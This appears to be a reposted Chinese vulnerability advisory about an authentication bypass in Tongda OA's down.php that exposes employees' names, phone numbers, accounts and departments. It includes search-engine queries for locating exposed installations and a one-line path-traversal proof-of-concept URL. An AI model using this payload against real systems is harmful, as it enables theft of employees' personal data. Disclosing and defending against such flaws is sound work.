通达OA down.php 存在信息泄露漏洞

2024年4月28日07:24:59评论14 views字数 283阅读0分56秒阅读模式

漏洞介绍

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件，存在一个认证绕过漏洞，利用该漏洞下载获取系统内所有员工信息，包括手机号、姓名、账号、部门等敏感信息。

影响版本

通达 OA

漏洞情报

搜索引擎语法

Fofa：app="TDXK-通达OA"Hunter：app.name="通达 OA"

POC

/inc/package/down.php?id=../../../cache/org

修复建议

建议及时更新至最新版本或者使用WAF安全设备防护！

原文始发于微信公众号（极星信安）：安全情报，X达OA down.php 存在信息泄露漏洞！！！

本文由 admin 发表于 2024年4月28日07:24:59
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
通达OA down.php 存在信息泄露漏洞https://cn-sec.com/archives/2692991.html

【漏洞预警】Apache OFBiz 目录遍历导致RCE漏洞CVE-2024-32113